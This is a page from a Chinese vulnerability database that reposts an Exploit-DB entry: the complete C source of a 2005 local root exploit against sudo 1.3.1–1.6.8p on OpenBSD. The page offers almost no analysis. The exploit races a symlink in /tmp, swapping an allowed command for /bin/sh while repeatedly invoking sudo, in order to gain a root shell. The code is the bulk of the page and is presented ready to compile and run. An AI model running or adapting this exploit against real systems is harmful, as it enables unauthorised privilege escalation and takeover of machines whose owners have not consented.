Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privilege Escalation

Sudo 1.3.1 < 1.6.8p (OpenBSD) – Pathname Validation Privilege Escalation

漏洞ID 1055219 漏洞类型
发布时间 2005-07-04 更新时间 2005-07-04
图片[1]-Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privilege Escalation-安全小百科CVE编号 N/A
图片[2]-Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privilege Escalation-安全小百科CNNVD-ID N/A
漏洞平台 BSD CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1087
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <sysexits.h> 
#include <sys/wait.h> 

#define SUDO "/usr/bin/sudo" 
#ifdef BUFSIZ 
#undef BUFSIZ 
#define BUFSIZ 128 
#endif 

/* 
ANY MODIFIED REPUBLISHING IS RESTRICTED 
OpenBSD sudo 1.3.1 - 1.6.8p local root exploit 
Tested under OpenBSD 3.6 sudo 1.6.7p5 
Vuln by OpenBSD errata, http://www.openbsd.org/errata.html 
(c)oded by __blf 2005 RusH Security Team, http://rst.void.ru 
Race condition in path name, can take a while to exploit 
Gr33tz: x97Rang, whice, rsh, MishaSt, Inck-Vizitor, BlackPrince 
Fck lamerz: Saint_I, nmalykh 
All rights reserved. 
ANY MODIFIED REPUBLISHING IS RESTRICTED 
*/ 

int main (int argc, char ** argv) 
{ 
pid_t pid; 
void * buffer; 
char * exec, * race, * path; 
if(argc != 3) 
{ 
fprintf(stderr, "r57sudo.c by __blfn"); 
fprintf(stderr, "RusH Security Teamn"); 
fprintf(stderr, "Usage: %s <sudo full path command> <sudo command>n", 
argv[0]); 
fprintf(stderr, "e.g. ./r57sudo /bin/ls lsn"); 
return EX_USAGE; 
} 
pid = fork(); 
if(pid == 0) 
{ 
while(1) 
{ 
exec = (char *)calloc(BUFSIZ, sizeof(char)); 
race = (char *)calloc(BUFSIZ, sizeof(char)); 
bzero(exec, sizeof(exec)); 
snprintf(exec, BUFSIZ, "ln -fs %s /tmp/%s", argv[1], argv[2]); 
system((char *)exec); 
bzero(race, sizeof(race)); 
snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]); 
system((char *)race); 
bzero(race, sizeof(race)); 
snprintf(race, BUFSIZ, "ln -fs /bin/sh /tmp/%s", argv[2]); 
system((char *)race); 
bzero(race, sizeof(race)); 
snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]); 
system((char *)race); 
} 
} 
if(pid > 0) 
{ 
while(1) 
{ 
path = (char *)calloc(BUFSIZ/2, sizeof(char)); 
snprintf(path, BUFSIZ/2, "%s /tmp/%s", SUDO, argv[2]); 
system((char *)path); 
} 
} 
} 

// milw0rm.com [2005-07-04]

相关推荐: FreeBSD procfs Denial of Service Vulnerability

FreeBSD procfs Denial of Service Vulnerability 漏洞ID 1103640 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2000-12-18 更新时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享